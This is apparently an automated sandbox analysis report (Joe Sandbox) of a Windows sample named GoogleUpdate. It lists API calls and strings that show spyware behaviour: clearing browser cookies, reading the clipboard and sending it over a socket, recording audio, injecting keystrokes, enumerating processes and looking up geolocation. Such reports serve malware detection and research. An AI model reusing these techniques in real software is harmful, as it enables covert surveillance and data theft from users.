                                • Associated: 0000000A.00000002.4123529006.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123619747.0000000000456000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123657048.000000000046E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123657048.0000000000471000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123700556.0000000000475000.00000002.00000001.01000000.00000008.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_400000_GoogleUpdate.jbxd
                                Yara matches
                                Similarity
                                • API ID: CloseEnvironmentExistsExpandFileOpenPathQueryStringsValue
                                • String ID: [IE cookies cleared!]$[IE cookies not found]$Cookies$P0F$Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
                                • API String ID: 1133728706-1451598199
                                • Opcode ID: 7d35b34a5c32c4cacedef9e57bb3c67f877bb4cbe8c78781d2c4aa2971c17524
                                • Instruction ID: 9e227284a7a69f00510d3be81dd7cde1580ac9a58a9ca8fbd928e09bf644cbd9
                                • Opcode Fuzzy Hash: 7d35b34a5c32c4cacedef9e57bb3c67f877bb4cbe8c78781d2c4aa2971c17524
                                • Instruction Fuzzy Hash: CF21B170A4020556CB00FBE2CC97DEE7368AF51348F80013FB901772D2EB795A45C6DA
                                APIs
                                • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,?,0042BAB6,?,?,?,00447215,00000001,00000001,?), ref: 0044701E
                                • __alloca_probe_16.LIBCMT ref: 00447056
                                • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,0042BAB6,?,?,?,00447215,00000001,00000001,?), ref: 004470A4
                                • __alloca_probe_16.LIBCMT ref: 0044713B
                                • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,?,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 0044719E
                                • __freea.LIBCMT ref: 004471AB
                                  • Part of subcall function 00443649: RtlAllocateHeap.NTDLL(00000000,00433049,?,P@,004365E7,?,?,00000000,?,P@,0040C88A,00433049,?,?,?,?), ref: 0044367B
                                • __freea.LIBCMT ref: 004471B4
                                • __freea.LIBCMT ref: 004471D9
                                Memory Dump Source
                                • Source File: 0000000A.00000002.4123563819.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 0000000A.00000002.4123529006.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123619747.0000000000456000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123657048.000000000046E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123657048.0000000000471000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123700556.0000000000475000.00000002.00000001.01000000.00000008.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_400000_GoogleUpdate.jbxd
                                Yara matches
                                Similarity
                                • API ID: ByteCharMultiWide__freea$__alloca_probe_16$AllocateHeap
                                • String ID:
                                • API String ID: 3864826663-0
                                • Opcode ID: 429851ce6ab608a1373ea908d8fe5c2358bbda3d7f1dde4b5ad8663d45493dac
                                • Instruction ID: 54c76e5b98bc3e662f405ec50a570bffd16f8396d3d33e450f7b83ec1f761fab
                                • Opcode Fuzzy Hash: 429851ce6ab608a1373ea908d8fe5c2358bbda3d7f1dde4b5ad8663d45493dac
                                • Instruction Fuzzy Hash: C051F372604216AFFB258F65CC81EAF77A9EB44754F19422EFC04D6340EB38DC4296A8
                                APIs
                                • SendInput.USER32(00000001,?,0000001C,?,?,00000000), ref: 00417982
                                • SendInput.USER32(00000001,?,0000001C,?,?,00000000,00000000), ref: 004179A3
                                • SendInput.USER32(00000001,?,0000001C,?,?,00000000,00000000), ref: 004179C3
                                • SendInput.USER32(00000001,?,0000001C,?,?,00000000,00000000), ref: 004179D7
                                • SendInput.USER32(00000001,?,0000001C,?,?,00000000,00000000), ref: 004179ED
                                • SendInput.USER32(00000001,?,0000001C,?,?,00000000), ref: 00417A0A
                                • SendInput.USER32(00000001,?,0000001C,?,?,00000000), ref: 00417A25
                                • SendInput.USER32(00000001,?,0000001C,?,00000000), ref: 00417A41
                                Memory Dump Source
                                • Source File: 0000000A.00000002.4123563819.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 0000000A.00000002.4123529006.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123619747.0000000000456000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123657048.000000000046E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123657048.0000000000471000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123700556.0000000000475000.00000002.00000001.01000000.00000008.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_400000_GoogleUpdate.jbxd
                                Yara matches
                                Similarity
                                • API ID: InputSend
                                • String ID:
                                • API String ID: 3431551938-0
                                • Opcode ID: 6aaf5890e5c1829a4f0a9f9de961f2057ca44ae286fc2f2a8f4f79c9cdb01491
                                • Instruction ID: 18205c9a4f61e0979ba7f31da2e0396e133b47f61cec1eebe1044e0c870e5742
                                • Opcode Fuzzy Hash: 6aaf5890e5c1829a4f0a9f9de961f2057ca44ae286fc2f2a8f4f79c9cdb01491
                                • Instruction Fuzzy Hash: BF3180715583086EE311CF51D941BEBBFECEF99B54F00080FF6809A191D2A696C98BA7
                                APIs
                                • OpenClipboard.USER32 ref: 00414F41
                                • EmptyClipboard.USER32 ref: 00414F4F
                                • CloseClipboard.USER32 ref: 00414F55
                                • OpenClipboard.USER32 ref: 00414F5C
                                • GetClipboardData.USER32(0000000D), ref: 00414F6C
                                • GlobalLock.KERNEL32(00000000), ref: 00414F75
                                • GlobalUnlock.KERNEL32(00000000), ref: 00414F7E
                                • CloseClipboard.USER32 ref: 00414F84
                                  • Part of subcall function 00404A81: send.WS2_32(FFFFFFFF,00000000,00000000,00000000,0040545D,?,?,00000004,?,?,00000004,?,00471E90,?), ref: 00404B16
                                Memory Dump Source
                                • Source File: 0000000A.00000002.4123563819.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 0000000A.00000002.4123529006.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123619747.0000000000456000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123657048.000000000046E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123657048.0000000000471000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123700556.0000000000475000.00000002.00000001.01000000.00000008.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_400000_GoogleUpdate.jbxd
                                Yara matches
                                Similarity
                                • API ID: Clipboard$CloseGlobalOpen$DataEmptyLockUnlocksend
                                • String ID:
                                • API String ID: 2172192267-0
                                • Opcode ID: 158d6fabbfdad93997b53c9794d9e51bddfba0ba71ac78c7de7087ddbe2f659e
                                • Instruction ID: b342c93700c1c5b5557293b3c64df63ecfc3f94f93ee8c928ebb46f035b43356
                                • Opcode Fuzzy Hash: 158d6fabbfdad93997b53c9794d9e51bddfba0ba71ac78c7de7087ddbe2f659e
                                • Instruction Fuzzy Hash: 7C015E312443009BD314BF71DC596AA76A8EBE0346F81057EB94A931A3DF3899498A9A
                                APIs
                                • RegEnumKeyExA.ADVAPI32 ref: 0041A47F
                                • RegOpenKeyExA.ADVAPI32(?,?,00000000,00020019,?), ref: 0041A4B0
                                • RegCloseKey.ADVAPI32(?), ref: 0041A749
                                Strings
                                Memory Dump Source
                                • Source File: 0000000A.00000002.4123563819.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 0000000A.00000002.4123529006.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123619747.0000000000456000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123657048.000000000046E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123657048.0000000000471000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123700556.0000000000475000.00000002.00000001.01000000.00000008.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_400000_GoogleUpdate.jbxd
                                Yara matches
                                Similarity
                                • API ID: CloseEnumOpen
                                • String ID: DisplayName
                                • API String ID: 1332880857-3786665039
                                • Opcode ID: 4d6256ca6c3ac919f3f8d4cba605b6823c2372603dcb2b171f06ea34bc636a85
                                • Instruction ID: 4431336161eaad6e2d2aa402c01db4654b3b7c935e82bf046b55a61e03329e01
                                • Opcode Fuzzy Hash: 4d6256ca6c3ac919f3f8d4cba605b6823c2372603dcb2b171f06ea34bc636a85
                                • Instruction Fuzzy Hash: 966132311182419BC328EB51D891EEFB3E8EF94348F50493FF586921E2EF749949CA5A
                                APIs
                                • GetConsoleCP.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,00447ECC,00453EB5,00000000,00000000,00000000,00000000,00000000), ref: 00447799
                                • __fassign.LIBCMT ref: 00447814
                                • __fassign.LIBCMT ref: 0044782F
                                • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,00000000,00000005,00000000,00000000), ref: 00447855
                                • WriteFile.KERNEL32(?,00000000,00000000,00447ECC,00000000,?,?,?,?,?,?,?,?,?,00447ECC,00453EB5), ref: 00447874
                                • WriteFile.KERNEL32(?,00453EB5,00000001,00447ECC,00000000,?,?,?,?,?,?,?,?,?,00447ECC,00453EB5), ref: 004478AD
                                Memory Dump Source
                                • Source File: 0000000A.00000002.4123563819.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 0000000A.00000002.4123529006.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123619747.0000000000456000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123657048.000000000046E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123657048.0000000000471000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123700556.0000000000475000.00000002.00000001.01000000.00000008.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_400000_GoogleUpdate.jbxd
                                Yara matches
                                Similarity
                                • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                • String ID:
                                • API String ID: 1324828854-0
                                • Opcode ID: a748b16374f527b7a80cf69ed727348adf3f69da4df0249be72511d103bd3332
                                • Instruction ID: 74b5e8c6f427b63fe2026e60454d3d85c0c1d9029b0a2cc1a9ecb7a500eaa1fe
                                • Opcode Fuzzy Hash: a748b16374f527b7a80cf69ed727348adf3f69da4df0249be72511d103bd3332
                                • Instruction Fuzzy Hash: 32510870E042499FEB10DFA8DC85AEEBBF8EF09300F14416BE951E7291E7749941CB69
                                APIs
                                  • Part of subcall function 00419F23: GetCurrentProcess.KERNEL32(?,?,?,00410C6A), ref: 00419F34
                                  • Part of subcall function 00419F23: IsWow64Process.KERNEL32(00000000,?,?,00410C6A), ref: 00419F3B
                                • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0040E305
                                • Process32FirstW.KERNEL32(00000000,?), ref: 0040E329
                                • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040E338
                                • CloseHandle.KERNEL32(00000000), ref: 0040E4EF
                                  • Part of subcall function 00419F51: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,0040DFB9,00000000,?,?,00000001), ref: 00419F66
                                  • Part of subcall function 00419F51: IsWow64Process.KERNEL32(00000000,?,?,?,00000001), ref: 00419F71
                                  • Part of subcall function 00419F87: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000), ref: 00419F9C
                                • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040E4E0
                                Strings
                                Memory Dump Source
                                • Source File: 0000000A.00000002.4123563819.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 0000000A.00000002.4123529006.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123619747.0000000000456000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123657048.000000000046E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123657048.0000000000471000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123700556.0000000000475000.00000002.00000001.01000000.00000008.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_400000_GoogleUpdate.jbxd
                                Yara matches
                                Similarity
                                • API ID: Process$Process32$NextOpenWow64$CloseCreateCurrentFirstHandleSnapshotToolhelp32
                                • String ID: XAF
                                • API String ID: 44284711-3946003707
                                • Opcode ID: 7f2cca916bbd420c66316d83435137cae89fcba16a13fcadf5b2299afb6f7b4b
                                • Instruction ID: 9ef93eb2fb75da2762b4731e21c5b8dc01158be40bd3d18dbb98703d8f1b3e60
                                • Opcode Fuzzy Hash: 7f2cca916bbd420c66316d83435137cae89fcba16a13fcadf5b2299afb6f7b4b
                                • Instruction Fuzzy Hash: 904101311082415BC365F761D991EEFB3A8AFD4344F50493EF48A921E2EF38994AC75A
                                APIs
                                • _strftime.LIBCMT ref: 00401D30
                                  • Part of subcall function 00401A4D: CreateFileW.KERNEL32(00000000,40000000,00000000), ref: 00401AB9
                                • waveInUnprepareHeader.WINMM(0046FA78,00000020,00000000,?), ref: 00401DE2
                                • waveInPrepareHeader.WINMM(0046FA78,00000020), ref: 00401E20
                                • waveInAddBuffer.WINMM(0046FA78,00000020), ref: 00401E2F
                                Strings
                                Memory Dump Source
                                • Source File: 0000000A.00000002.4123563819.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 0000000A.00000002.4123529006.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123619747.0000000000456000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123657048.000000000046E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123657048.0000000000471000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123700556.0000000000475000.00000002.00000001.01000000.00000008.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_400000_GoogleUpdate.jbxd
                                Yara matches
                                Similarity
                                • API ID: wave$Header$BufferCreateFilePrepareUnprepare_strftime
                                • String ID: %Y-%m-%d %H.%M$.wav
                                • API String ID: 3809562944-3597965672
                                • Opcode ID: 56e85467894a34748c48d0f1eb6f7913f46ef2942ef546941b50b0fa89a5bbba
                                • Instruction ID: eb6f517cf981021e41f9baa65c06222081641aa24e02a1e4c78245b08a68fc14
                                • Opcode Fuzzy Hash: 56e85467894a34748c48d0f1eb6f7913f46ef2942ef546941b50b0fa89a5bbba
                                • Instruction Fuzzy Hash: 743150315043009BC314EBA1EC56A9E77E8FB54318F50893EF599A21F2EFB49909CB5E
                                Memory Dump Source
                                • Source File: 0000000A.00000002.4123563819.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 0000000A.00000002.4123529006.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123619747.0000000000456000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123657048.000000000046E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123657048.0000000000471000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123700556.0000000000475000.00000002.00000001.01000000.00000008.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_400000_GoogleUpdate.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 0fe7a57eeb80513b7b5fe64b1e34abf19149bc3f23fae782b0bf022f83ee5f09
                                • Instruction ID: 106e2cecea33a690a52cc41c1271e31c3df1f85e8271d36c5dacef07d135bc52
                                • Opcode Fuzzy Hash: 0fe7a57eeb80513b7b5fe64b1e34abf19149bc3f23fae782b0bf022f83ee5f09
                                • Instruction Fuzzy Hash: 2C113232504214BBCB213F769C0596B7B7CDF857A7F11062BFC1583292DA38C9089269
                                APIs
                                • InternetOpenW.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00419392
                                • InternetOpenUrlW.WININET(00000000,http://geoplugin.net/json.gp,00000000,00000000,80000000,00000000), ref: 004193A8
                                • InternetReadFile.WININET(00000000,00000000,0000FFFF,00000000), ref: 004193C1
                                • InternetCloseHandle.WININET(00000000), ref: 00419407
                                • InternetCloseHandle.WININET(00000000), ref: 0041940A
                                Strings
                                • http://geoplugin.net/json.gp, xrefs: 004193A2
                                Memory Dump Source
                                • Source File: 0000000A.00000002.4123563819.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 0000000A.00000002.4123529006.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123619747.0000000000456000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123657048.000000000046E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123657048.0000000000471000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123700556.0000000000475000.00000002.00000001.01000000.00000008.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_400000_GoogleUpdate.jbxd
                                Yara matches
                                Similarity
                                • API ID: Internet$CloseHandleOpen$FileRead
                                • String ID: http://geoplugin.net/json.gp
                                • API String ID: 3121278467-91888290
                                • Opcode ID: 1de93e443a2e282a937f16c0ceb55f66d1fcd2319b03e24e709da9e0a2a31626
                                • Instruction ID: 9fad89c028030122b1819b6a874fefb9d729214f45c39af6bed7b2b06c6e4f32
                                • Opcode Fuzzy Hash: 1de93e443a2e282a937f16c0ceb55f66d1fcd2319b03e24e709da9e0a2a31626
                                • Instruction Fuzzy Hash: 3311C8311053126BD224EF169C59DABBF9CEF85765F40053EF905A32C1DBA8DC44C6A9
                                APIs
                                  • Part of subcall function 0044DE21: _free.LIBCMT ref: 0044DE4A
                                • _free.LIBCMT ref: 0044E128
                                  • Part of subcall function 00443C92: HeapFree.KERNEL32(00000000,00000000,?,0044DE4F,?,00000000,?,00000000,?,0044E0F3,?,00000007,?,?,0044E63E,?), ref: 00443CA8
                                  • Part of subcall function 00443C92: GetLastError.KERNEL32(?,?,0044DE4F,?,00000000,?,00000000,?,0044E0F3,?,00000007,?,?,0044E63E,?,?), ref: 00443CBA
                                • _free.LIBCMT ref: 0044E133
                                • _free.LIBCMT ref: 0044E13E
                                • _free.LIBCMT ref: 0044E192
                                • _free.LIBCMT ref: 0044E19D
                                • _free.LIBCMT ref: 0044E1A8
                                • _free.LIBCMT ref: 0044E1B3
                                Memory Dump Source
                                • Source File: 0000000A.00000002.4123563819.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 0000000A.00000002.4123529006.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123619747.0000000000456000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123657048.000000000046E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123657048.0000000000471000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123700556.0000000000475000.00000002.00000001.01000000.00000008.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_400000_GoogleUpdate.jbxd
                                Yara matches
                                Similarity
                                • API ID: _free$ErrorFreeHeapLast
                                • String ID:
                                • API String ID: 776569668-0
                                • Opcode ID: d645742a9f031bfd4c53cfe37fe00a001808073c56fe889b6c8b285726f20831
                                • Instruction ID: b65b67035ea7ffc6fe2c1778d32cb4f6cbb79ca162155871331ff7aa41bb66fd
                                • Opcode Fuzzy Hash: d645742a9f031bfd4c53cfe37fe00a001808073c56fe889b6c8b285726f20831
                                • Instruction Fuzzy Hash: 64111571940B08AAE520BFF2CC47FCBB7DC9F14708F50882EB29D6A552DA7DB6044654
                                APIs
                                • GetLastError.KERNEL32(?,?,004380F1,0043705E), ref: 00438108
                                • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00438116
                                • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0043812F
                                • SetLastError.KERNEL32(00000000,?,004380F1,0043705E), ref: 00438181
                                Memory Dump Source
                                • Source File: 0000000A.00000002.4123563819.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 0000000A.00000002.4123529006.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123619747.0000000000456000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123657048.000000000046E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123657048.0000000000471000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123700556.0000000000475000.00000002.00000001.01000000.00000008.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_400000_GoogleUpdate.jbxd
                                Yara matches
                                Similarity
                                • API ID: ErrorLastValue___vcrt_
                                • String ID:
                                • API String ID: 3852720340-0
                                • Opcode ID: 8fa3eba41d5dfcfa025b4cdbc1becdc984892f6557d94f52d480fd9577c81c63
                                • Instruction ID: 5a832d73688d02476ca7511e273f3515cfb573674d76dbd3fe9934521fa1a72b
                                • Opcode Fuzzy Hash: 8fa3eba41d5dfcfa025b4cdbc1becdc984892f6557d94f52d480fd9577c81c63
                                • Instruction Fuzzy Hash: F101283210C3326EAA102F767C85A1BAA94EB09779F31633FF214951E1FFA99C02550C
                                APIs
                                • DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Cookies), ref: 0040AA1E
                                • GetLastError.KERNEL32 ref: 0040AA28
                                Strings
                                • [Chrome Cookies not found], xrefs: 0040AA42
                                • [Chrome Cookies found, cleared!], xrefs: 0040AA4E
                                • \AppData\Local\Google\Chrome\User Data\Default\Cookies, xrefs: 0040A9E9
                                • UserProfile, xrefs: 0040A9EE
                                Memory Dump Source
                                • Source File: 0000000A.00000002.4123563819.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 0000000A.00000002.4123529006.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123619747.0000000000456000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123657048.000000000046E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123657048.0000000000471000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123700556.0000000000475000.00000002.00000001.01000000.00000008.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_400000_GoogleUpdate.jbxd
                                Yara matches
                                Similarity
                                • API ID: DeleteErrorFileLast
                                • String ID: [Chrome Cookies found, cleared!]$[Chrome Cookies not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Cookies
                                • API String ID: 2018770650-304995407
                                • Opcode ID: 0a61cd6b6495849643311647e231b500c121e93944a07ca1c82b24e95f3714a3
                                • Instruction ID: 1f34f6daae66b163f55af04f15e1d0b60933b3567ae099988c08ef58cbd90c9e
                                • Opcode Fuzzy Hash: 0a61cd6b6495849643311647e231b500c121e93944a07ca1c82b24e95f3714a3
                                • Instruction Fuzzy Hash: 0E01F731B4020467C6047A75DD278AE77249951304B50057FF402773D2FD798915CA9F
                                APIs
                                • _free.LIBCMT ref: 00441566
                                  • Part of subcall function 00443C92: HeapFree.KERNEL32(00000000,00000000,?,0044DE4F,?,00000000,?,00000000,?,0044E0F3,?,00000007,?,?,0044E63E,?), ref: 00443CA8
                                  • Part of subcall function 00443C92: GetLastError.KERNEL32(?,?,0044DE4F,?,00000000,?,00000000,?,0044E0F3,?,00000007,?,?,0044E63E,?,?), ref: 00443CBA
                                • _free.LIBCMT ref: 00441578
                                • _free.LIBCMT ref: 0044158B
                                • _free.LIBCMT ref: 0044159C
                                • _free.LIBCMT ref: 004415AD
                                Strings
                                Memory Dump Source
                                • Source File: 0000000A.00000002.4123563819.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 0000000A.00000002.4123529006.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123619747.0000000000456000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123657048.000000000046E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123657048.0000000000471000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123700556.0000000000475000.00000002.00000001.01000000.00000008.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_400000_GoogleUpdate.jbxd
                                Yara matches
                                Similarity
                                • API ID: _free$ErrorFreeHeapLast
                                • String ID: pF
                                • API String ID: 776569668-2973420481
                                • Opcode ID: dc25ad9d7c881d5a7498954b547f4469e613371529959f9048218c6a37a16c45
                                • Instruction ID: 534a9c52bd02544fd4565401bb604a6095318b382a753ef56e7f6fd0a1c42297
                                • Opcode Fuzzy Hash: dc25ad9d7c881d5a7498954b547f4469e613371529959f9048218c6a37a16c45
                                • Instruction Fuzzy Hash: 00F030B78052209BD7016F55BC864053BA0BB04B29305853BF8ADE6670FBB90A458F8E
                                APIs
                                • __allrem.LIBCMT ref: 00438A09
                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00438A25
                                • __allrem.LIBCMT ref: 00438A3C
                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00438A5A
                                • __allrem.LIBCMT ref: 00438A71
                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00438A8F
                                Memory Dump Source
                                • Source File: 0000000A.00000002.4123563819.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 0000000A.00000002.4123529006.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123619747.0000000000456000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123657048.000000000046E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123657048.0000000000471000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123700556.0000000000475000.00000002.00000001.01000000.00000008.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_400000_GoogleUpdate.jbxd
                                Yara matches
                                Similarity
                                • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
                                • String ID:
                                • API String ID: 1992179935-0
                                • Opcode ID: a5bb698a37765ca5ad947defe33ca2ea1dc364bfd829a3e03f22b831f39bfe5b
                                • Instruction ID: 1db505a437643d25cad1e1ab06004ebe691486694b679651004c0d70fbe8f9c1
                                • Opcode Fuzzy Hash: a5bb698a37765ca5ad947defe33ca2ea1dc364bfd829a3e03f22b831f39bfe5b
                                • Instruction Fuzzy Hash: CD815972A007069BE724BA29CC41B6BF3E8AF49328F14512FF511D6382EF78D900875D
                                APIs
                                  • Part of subcall function 00410201: SetLastError.KERNEL32(0000000D,00410781,00000000,?,?,?,?,?,?,?,?,?,?,?,?,0041075F), ref: 00410207
                                • SetLastError.KERNEL32(000000C1,00000000,?,?,?,?,?,?,?,?,?,?,?,?,0041075F), ref: 0041079C
                                • GetNativeSystemInfo.KERNEL32(?,0040BE60,00000000,?,?,?,?,?,?,?,?,?,?,?,?,0041075F), ref: 0041080A
                                • SetLastError.KERNEL32(0000000E,?,?,?,?,?,?,?,?,?), ref: 0041082E
                                  • Part of subcall function 00410708: VirtualAlloc.KERNEL32(00000004,00000004,00000004,00000004,0041084C,?,00000000,00003000,00000004,00000000,?,?), ref: 00410718
                                • GetProcessHeap.KERNEL32(00000008,00000040,?,?,?,?,?), ref: 00410875
                                • HeapAlloc.KERNEL32(00000000,?,?,?,?,?), ref: 0041087C
                                • SetLastError.KERNEL32(0000045A,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0041098F
